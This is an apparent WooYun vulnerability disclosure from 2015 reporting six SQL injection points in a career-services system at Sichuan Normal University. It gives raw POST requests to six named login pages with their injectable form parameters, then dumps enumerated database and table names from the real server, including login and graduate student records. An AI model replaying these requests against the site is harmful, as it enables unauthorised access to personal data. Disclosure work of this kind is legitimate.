当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148430

漏洞标题:四川师范大学某系统漏洞六处SQL注入打包

相关厂商:sicnu.edu.cn

漏洞作者: lufsy

提交时间:2015-10-25 21:22

修复时间:2015-10-26 09:18

公开时间:2015-10-26 09:18

漏洞类型:

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-25: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

四川师范大学是四川省人民政府举办的全日制综合性省属重点大学,是四川省举办师范类本科专业最早、师范类院校中办学历史最为悠久的大学。

详细说明:

0x01

http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-career/sd_zjc_career_login_admin.aspx
参数TextBox1,TextBox2
POST /zjc-career-websys-2009/zjc-career/sd_zjc_career_login_admin.aspx HTTP/1.1
Host: zjc.sicnu.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,zh-CN;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-career/sd_zjc_career_login_admin.aspx
Cookie: _gscu_1801480793=45330573ctexph17; _gscbrs_1801480793=1
X-Forwarded-For: 127.0.0.1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 271
__VIEWSTATE=%2FwEPDwUKMTc2Njk0OTI2OGRkbHqnhPqGoYt899R08wS6KEUzl0rhQZiMJ64HF1Q%2BvmA%3D&__EVENTVALIDATION=%2FwEWBALi7M%2F4DwLs0bLrBgLs0fbZDAKM54rGBs3pXJ1JCnU5%2BxdUCDSCeXYKQtPC0DUNSJu%2B6CE6ga%2BS&TextBox1=admin&TextBox2=123456&Button1=%E7%99%BB%E5%BD%95%E7%B3%BB%E7%BB%9F


0x02
http://zjc.sicnu.edu.cn//zjc-career-websys-2009/zjc-career/sd_zjc_career_login_college.aspx

POST /zjc-career-websys-2009/zjc-career/sd_zjc_career_login_college.aspx HTTP/1.1
Host: zjc.sicnu.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,zh-CN;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-
career/sd_zjc_career_login_college.aspx
Cookie: screenwidth=1366; screenheight=768; _gscu_1801480793=45330573ctexph17; 
ASP.NET_SessionId=v0x4g5mkighmmehoehpd0yli; 
sourcePageUrl=Url=http://zjc.sicnu.edu.cn/zhaoshengwang/DataDownload/default.aspx&Reco
rdTime=Commontools2
X-Forwarded-For: 127.0.0.1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 282
__VIEWSTATE=%2FwEPDwUJMTk5OTI1MTIzZGR9JRvrS6sjXxr%2Bl%2FmwaC7Dvrigzf2dzZmBLJAJlbVFQA
%3D%3D&__EVENTVALIDATION=
%2FwEWBAKF65rHBQLs0bLrBgLs0fbZDAKM54rGBplHcU5b9jVAyuHXlU6%2BubIIj4cErpl55Z7jl%2F
%2F0syNS&TextBox1=2010190422&TextBox2=2010190422&Button1=%E7%99%BB%E5%BD%95%E7%B3%BB
%E7%BB%9F


0x03
1.
http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-student-sys/zjc_student_goverment_bc.aspx
2.
http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-student-sys/zjc_student_goverment_jbc.aspx
博程教育和金标尺教育正在进行中

POST /zjc-career-websys-2009/zjc-student-sys/zjc_student_goverment_bc.aspx HTTP/1.1
Host: zjc.sicnu.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,zh-CN;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-student-
sys/zjc_student_goverment_bc.aspx
Cookie: _gscu_1801480793=45330573ctexph17; ASP.NET_SessionId=v0x4g5mkighmmehoehpd0yli; 
sourcePageUrl=Url=http://zjc.sicnu.edu.cn/zhaoshengwang/Athlete/AthleteLogin.aspx&Reco
rdTime=2015-10-20 22:08:27
X-Forwarded-For: 127.0.0.1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 312
__VIEWSTATE=
%2FwEPDwULLTE3MDMyOTQ5MzJkZOk34l9qU4Xq8zoHOgQo5OH5c4S6DBJrPshlxw8A4bcx&__EVENTVALIDATI
ON=%2FwEWBgLu37y5BQLs0bLrBgLs0fbZDAKNi6WLBgKSi6WLBgKM54rGBjOQryc8CB7SgSU7jUQhDrJE
%2Fbk1%2BuBoWhARuoZMqvGi&TextBox1=2010190422&TextBox2=411111111111111111&DropDownList1
=0&Button1=%E7%99%BB%E5%BD%95%E7%B3%BB%E7%BB%9F


0x04
1.
http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-career/sd_zjc_career_login_stu_person_career_advice.aspx

POST /zjc-career-websys-2009/zjc-
career/sd_zjc_career_login_stu_person_career_advice.aspx HTTP/1.1
Host: zjc.sicnu.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,zh-CN;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-
career/sd_zjc_career_login_stu_person_career_advice.aspx
Cookie: screenwidth=1366; screenheight=768; _gscu_1801480793=45330573ctexph17; 
ASP.NET_SessionId=v0x4g5mkighmmehoehpd0yli; 
sourcePageUrl=Url=http://zjc.sicnu.edu.cn/zhaoshengwang/Athlete/AthleteLogin.aspx&Reco
rdTime=2015-10-20 22:08:27
X-Forwarded-For: 127.0.0.1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 328
__VIEWSTATE=%2FwEPDwULLTE1OTY2MDk3OTdkZDoDw7ujhNbRnxLTfbQxzbV%2FZooSahVU1n0QYldDJ
%2FLw&__EVENTVALIDATION=
%2FwEWCQKsnJEzAuzRsusGAuzR9tkMAo2LpYsGApKLpYsGApOLpYsGApCLpYsGAoznisYGArursYYIpUyej30b
GkkZMSHMpMEI6%2BP8beXj2B9LnvSx34fqaJM
%3D&TextBox1=2010190422&TextBox2=123456&DropDownList1=0&Button1=%E7%99%BB%E5%BD
%95%E7%B3%BB%E7%BB%9F


0x05
1.
http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-career/sd_zjc_career_login_stu_list.aspx

POST /zjc-career-websys-2009/zjc-career/sd_zjc_career_login_stu_list.aspx HTTP/1.1
Host: zjc.sicnu.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,zh-CN;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-
career/sd_zjc_career_login_stu_list.aspx
Cookie: screenwidth=1366; screenheight=768; _gscu_1801480793=45330573ctexph17; 
ASP.NET_SessionId=v0x4g5mkighmmehoehpd0yli
X-Forwarded-For: 127.0.0.1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 320
__VIEWSTATE=%2FwEPDwUKLTM5MjU2MzEzMGRkUakQ6byNx6itkwyXUQqCcpyMw%2FIhQDvrysEVs0ewR2o
%3D&__EVENTVALIDATION=
%2FwEWBwLzpO64DALs0bLrBgLs0fbZDAKSi6WLBgKTi6WLBgKNi6WLBgKM54rGBv3pUKCZcBZTNyKGnBzHl12h
QPJloKn2wnicfvPRDrMJ&TextBox1=2015111111&TextBox2=111111111111111111&DropDownList1=1&B
utton1=%E7%99%BB%E5%BD%95%E7%B3%BB%E7%BB%9F


0x06
1.
http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-career/sd_zjc_career_login_stu_filepost.aspx

POST /zjc-career-websys-2009/zjc-career/sd_zjc_career_login_stu_filepost.aspx HTTP/1.1
Host: zjc.sicnu.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,zh-CN;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-
career/sd_zjc_career_login_stu_filepost.aspx
Cookie: screenwidth=1366; screenheight=768; _gscu_1801480793=45330573ctexph17; 
ASP.NET_SessionId=v0x4g5mkighmmehoehpd0yli
X-Forwarded-For: 127.0.0.1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 324
__VIEWSTATE=%2FwEPDwUKLTM5MjU2MzEzMGRkPDv4zYL88Frgyixa4DoR13CiwsegFsy6AjGqp6qmSCU
%3D&__EVENTVALIDATION=
%2FwEWBwKZgouOBgLs0bLrBgLs0fbZDAKNi6WLBgKSi6WLBgKTi6WLBgKM54rGBh2xSn%2FtCGq5Uoc5OQ
%2BDFnoDZbGXTc6OzHMY0hzkKw9R&TextBox1=201533333333&TextBox2=411333333333333333&DropDow
nList1=0&Button1=%E7%99%BB%E5%BD%95%E7%B3%BB%E7%BB%9F


1.png


2.
http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-career/sd_zjc_career_login_company.aspx

POST /zjc-career-websys-2009/zjc-career/sd_zjc_career_login_company.aspx HTTP/1.1
Host: zjc.sicnu.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,zh-CN;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-
career/sd_zjc_career_login_company.aspx
Cookie: screenwidth=1366; screenheight=768; _gscu_1801480793=45330573ctexph17; 
ASP.NET_SessionId=v0x4g5mkighmmehoehpd0yli
X-Forwarded-For: 127.0.0.1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 264
__VIEWSTATE=%2FwEPDwUJMTk5OTI1MTIzZGRGtkKYoI2W6eHmc%2FCRBAItvF1MrTkl%2BieNL7C8xJI48Q
%3D%3D&__EVENTVALIDATION=
%2FwEWBALVjsWdBALs0bLrBgLs0fbZDAKM54rGBubZdQM2gAB29JARjOjHY0ML1THiRuAXjI
%2F3lBm3RNP9&TextBox1=666&TextBox2=666&Button1=%E7%99%BB%E5%BD%95%E7%B3%BB%E7%BB%9F

漏洞证明:


1.png


2.png


3.png


Database: zsw_MajorIntro
[2 tables]
+-----------------------------------------------------+
| AcdamicIntros |
| MajorIntros |
+-----------------------------------------------------+
Database: Sd_zjc_career_web_netconfer
[35 tables]
+-----------------------------------------------------+
| Confer_dwszddm |
| company_infos |
| sd_career_confer_reply |
| sd_career_examine_2014_xl |
| sd_career_examine_2014_xl |
| sd_career_examine_2015 |
| sd_career_examine_2016_xl |
| sd_career_examine_2016_xl |
| sd_career_examine_2016_xy_zy |
| sd_career_news |
| sd_career_notice |
| sd_career_online |
| sd_career_person_career_advice_school_teacher |
| sd_career_person_career_advice_stu_register_year_xy |
| sd_career_person_career_advice_stu_register_year_xy |
| sd_career_person_career_advice_stu_register_year_zy |
| sd_career_policy |
| sd_career_skill |
| sd_zjc_admin_login |
| sd_zjc_college_login |
| sd_zjc_file_information |
| solicit2010_infor_bullentin |
| solicit2014_infor_count |
| stuinfos_base_graduate |
| stuinfos_base_graduate |
| stuinfos_card_graduate |
| stuinfos_card_graduate |
| stuinfos_career_renew_graduate |
| stuinfos_career_renew_graduate |
| stuinfos_confer_graduate |
| stuinfos_confer_graduate |
| stuinfos_list_graduate |
| stuinfos_list_graduate |
| 公务员事业单位考前培训报名
| 招聘单位信息总库待整理
+-----------------------------------------------------+
Database: master
[359 tables]
+-----------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.backup_devices |
| sys.certificates |
| sys.change_tracking_databases |
| sys.change_tracking_tables |
| sys.check_constraints |
| sys.column_type_usages |
| sys.column_xml_schema_collection_usages |
| sys.columns |
| sys.computed_columns |
| sys.configurations |
| sys.conversation_endpoints |
| sys.conversation_groups |
| sys.conversation_priorities |
| sys.credentials |
| sys.crypt_properties |
| sys.cryptographic_providers |
| sys.data_spaces |
| sys.database_audit_specification_details |
| sys.database_audit_specifications |
| sys.database_files |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_witnesses |
| sys.database_permissions |
| sys.database_principal_aliases |
| sys.database_principals |
| sys.database_recovery_status |
| sys.database_role_members |
| sys.databases |
| sys.default_constraints |
| sys.destination_data_spaces |
| sys.dm_audit_actions |
| sys.dm_audit_class_type_map |
| sys.dm_broker_activated_tasks |
| sys.dm_broker_connections |
| sys.dm_broker_forwarded_messages |
| sys.dm_broker_queue_monitors |
| sys.dm_cdc_errors |
| sys.dm_cdc_log_scan_sessions |
| sys.dm_clr_appdomains |
| sys.dm_clr_loaded_assemblies |
| sys.dm_clr_properties |
| sys.dm_clr_tasks |
| sys.dm_cryptographic_provider_properties |
| sys.dm_database_encryption_keys |
| sys.dm_db_file_space_usage |
| sys.dm_db_index_usage_stats |
| sys.dm_db_mirroring_auto_page_repair |
| sys.dm_db_mirroring_connections |
| sys.dm_db_mirroring_past_actions |
| sys.dm_db_missing_index_details |
| sys.dm_db_missing_index_group_stats |
| sys.dm_db_missing_index_groups |
| sys.dm_db_partition_stats |
| sys.dm_db_persisted_sku_features |
| sys.dm_db_script_level |
| sys.dm_db_session_space_usage |
| sys.dm_db_task_space_usage |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_cached_plans |
| sys.dm_exec_connections |
| sys.dm_exec_procedure_stats |
| sys.dm_exec_query_memory_grants |
| sys.dm_exec_query_optimizer_info |
| sys.dm_exec_query_resource_semaphores |
| sys.dm_exec_query_stats |
| sys.dm_exec_query_transformation_stats |
| sys.dm_exec_requests |
| sys.dm_exec_sessions |
| sys.dm_exec_trigger_stats |
| sys.dm_filestream_file_io_handles |
| sys.dm_filestream_file_io_requests |
| sys.dm_fts_active_catalogs |
| sys.dm_fts_fdhosts |
| sys.dm_fts_index_population |
| sys.dm_fts_memory_buffers |
| sys.dm_fts_memory_pools |
| sys.dm_fts_outstanding_batches |
| sys.dm_fts_population_ranges |
| sys.dm_io_backup_tapes |
| sys.dm_io_cluster_shared_drives |
| sys.dm_io_pending_io_requests |
| sys.dm_os_buffer_descriptors |
| sys.dm_os_child_instances |
| sys.dm_os_cluster_nodes |
| sys.dm_os_dispatcher_pools |
| sys.dm_os_dispatchers |
| sys.dm_os_hosts |
| sys.dm_os_latch_stats |
| sys.dm_os_loaded_modules |
| sys.dm_os_memory_allocations |
| sys.dm_os_memory_brokers |
| sys.dm_os_memory_cache_clock_hands |
| sys.dm_os_memory_cache_counters |
| sys.dm_os_memory_cache_entries |
| sys.dm_os_memory_cache_hash_tables |
| sys.dm_os_memory_clerks |
| sys.dm_os_memory_node_access_stats |
| sys.dm_os_memory_nodes |
| sys.dm_os_memory_objects |
| sys.dm_os_memory_pools |
| sys.dm_os_nodes |
| sys.dm_os_performance_counters |
| sys.dm_os_process_memory |
| sys.dm_os_ring_buffers |
| sys.dm_os_schedulers |
| sys.dm_os_spinlock_stats |
| sys.dm_os_stacks |
| sys.dm_os_sublatches |
| sys.dm_os_sys_info |
| sys.dm_os_sys_memory |
| sys.dm_os_tasks |
| sys.dm_os_threads |
| sys.dm_os_virtual_address_dump |
| sys.dm_os_wait_stats |
| sys.dm_os_waiting_tasks |
| sys.dm_os_worker_local_storage |
| sys.dm_os_workers |
| sys.dm_qn_subscriptions |
| sys.dm_repl_articles |
| sys.dm_repl_schemas |
| sys.dm_repl_tranhash |
| sys.dm_repl_traninfo |
| sys.dm_resource_governor_configuration |
| sys.dm_resource_governor_resource_pools |
| sys.dm_resource_governor_workload_groups |
| sys.dm_server_audit_status |
| sys.dm_tran_active_snapshot_database_transactions |
| sys.dm_tran_active_transactions |
| sys.dm_tran_commit_table |
| sys.dm_tran_current_snapshot |
| sys.dm_tran_current_transaction |
| sys.dm_tran_database_transactions |
| sys.dm_tran_locks |
| sys.dm_tran_session_transactions |
| sys.dm_tran_top_version_generators |
| sys.dm_tran_transactions_snapshot |
| sys.dm_tran_version_store |
| sys.dm_xe_map_values |
| sys.dm_xe_object_columns |
| sys.dm_xe_objects |
| sys.dm_xe_packages |
| sys.dm_xe_session_event_actions |
| sys.dm_xe_session_events |
| sys.dm_xe_session_object_columns |
| sys.dm_xe_session_targets |
| sys.dm_xe_sessions |
| sys.endpoint_webmethods |
| sys.endpoints |
| sys.event_notification_event_types |
| sys.event_notifications |
| sys.events |
| sys.extended_procedures |
| sys.extended_properties |
| sys.filegroups |
| sys.foreign_key_columns |
| sys.foreign_keys |
| sys.fulltext_catalogs |
| sys.fulltext_document_types |
| sys.fulltext_index_catalog_usages |
| sys.fulltext_index_columns |
| sys.fulltext_index_fragments |
| sys.fulltext_indexes |
| sys.fulltext_languages |
| sys.fulltext_stoplists |
| sys.fulltext_stopwords |
| sys.fulltext_system_stopwords |
| sys.function_order_columns |
| sys.http_endpoints |
| sys.identity_columns |
| sys.index_columns |
| sys.indexes |
| sys.internal_tables |
| sys.key_constraints |
| sys.key_encryptions |
| sys.linked_logins |
| sys.login_token |
| sys.master_files |
| sys.master_key_passwords |
| sys.message_type_xml_schema_collection_usages |
| sys.messages |
| sys.module_assembly_usages |
| sys.numbered_procedure_parameters |
| sys.numbered_procedures |
| sys.objects |
| sys.openkeys |
| sys.parameter_type_usages |
| sys.parameter_xml_schema_collection_usages |
| sys.parameters |
| sys.partition_functions |
| sys.partition_parameters |
| sys.partition_range_values |
| sys.partition_schemes |
| sys.partitions |
| sys.plan_guides |
| sys.procedures |
| sys.remote_logins |
| sys.remote_service_bindings |
| sys.resource_governor_configuration |
| sys.resource_governor_resource_pools |
| sys.resource_governor_workload_groups |
| sys.routes |
| sys.schemas |
| sys.securable_classes |
| sys.server_assembly_modules |
| sys.server_audit_specification_details |
| sys.server_audit_specifications |
| sys.server_audits |
| sys.server_event_notifications |
| sys.server_event_session_actions |
| sys.server_event_session_events |
| sys.server_event_session_fields |
| sys.server_event_session_targets |
| sys.server_event_sessions |
| sys.server_events |
| sys.server_file_audits |
| sys.server_permissions |
| sys.server_principal_credentials |
| sys.server_principals |
| sys.server_role_members |
| sys.server_sql_modules |
| sys.server_trigger_events |
| sys.server_triggers |
| sys.servers |
| sys.service_broker_endpoints |
| sys.service_contract_message_usages |
| sys.service_contract_usages |
| sys.service_contracts |
| sys.service_message_types |
| sys.service_queue_usages |
| sys.service_queues |
| sys.services |
| sys.soap_endpoints |
| sys.spatial_index_tessellations |
| sys.spatial_indexes |
| sys.spatial_reference_systems |
| sys.sql_dependencies |
| sys.sql_expression_dependencies |
| sys.sql_logins |
| sys.sql_modules |
| sys.stats_columns |
| sys.stats_columns |
| sys.symmetric_keys |
| sys.synonyms |
| sys.sysaltfiles |
| sys.syscacheobjects |
| sys.syscharsets |
| sys.syscolumns |
| sys.syscomments |
| sys.sysconfigures |
| sys.sysconstraints |
| sys.syscurconfigs |
| sys.syscursorcolumns |
| sys.syscursorrefs |
| sys.syscursors |
| sys.syscursortables |
| sys.sysdatabases |
| sys.sysdepends |
| sys.sysdevices |
| sys.sysfilegroups |
| sys.sysfiles |
| sys.sysforeignkeys |
| sys.sysfulltextcatalogs |
| sys.sysindexes |
| sys.sysindexkeys |
| sys.syslanguages |
| sys.syslockinfo |
| sys.syslogins |
| sys.sysmembers |
| sys.sysmessages |
| sys.sysobjects |
| sys.sysoledbusers |
| sys.sysopentapes |
| sys.sysperfinfo |
| sys.syspermissions |
| sys.sysprocesses |
| sys.sysprotects |
| sys.sysreferences |
| sys.sysremotelogins |
| sys.sysservers |
| sys.system_columns |
| sys.system_components_surface_area_configuration |
| sys.system_internals_allocation_units |
| sys.system_internals_partition_columns |
| sys.system_internals_partitions |
| sys.system_objects |
| sys.system_parameters |
| sys.system_sql_modules |
| sys.system_views |
| sys.systypes |
| sys.sysusers |
| sys.table_types |
| sys.tables |
| sys.tcp_endpoints |
| sys.trace_categories |
| sys.trace_columns |
| sys.trace_event_bindings |
| sys.trace_events |
| sys.trace_subclass_values |
| sys.traces |
| sys.transmission_queue |
| sys.trigger_event_types |
| sys.trigger_events |
| sys.triggers |
| sys.type_assembly_usages |
| sys.types |
| sys.user_token |
| sys.via_endpoints |
| sys.views |
| sys.xml_indexes |
| sys.xml_schema_attributes |
| sys.xml_schema_collections |
| sys.xml_schema_component_placements |
| sys.xml_schema_components |
| sys.xml_schema_elements |
| sys.xml_schema_facets |
| sys.xml_schema_model_groups |
| sys.xml_schema_namespaces |
| sys.xml_schema_types |
| sys.xml_schema_wildcard_namespaces |
| sys.xml_schema_wildcards |
+-----------------------------------------------------+
Database: msdb
[21 tables]
+-----------------------------------------------------+
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| logmarkhistory |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| suspect_pages |
| sysdac_instances |
| syspolicy_conditions |
| syspolicy_configuration |
| syspolicy_object_sets |
| syspolicy_policies |
| syspolicy_policy_categories |
| syspolicy_policy_category_subscriptions |
| syspolicy_policy_execution_history_details |
| syspolicy_policy_execution_history_details |
| syspolicy_system_health_state |
| syspolicy_target_set_levels |
| syspolicy_target_sets |
+-----------------------------------------------------+
部分数据信息:

4.png

修复方案:

过滤

版权声明:转载请注明来源 lufsy@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-26 09:18

厂商回复:

相关漏洞已被提交过。

最新状态:

暂无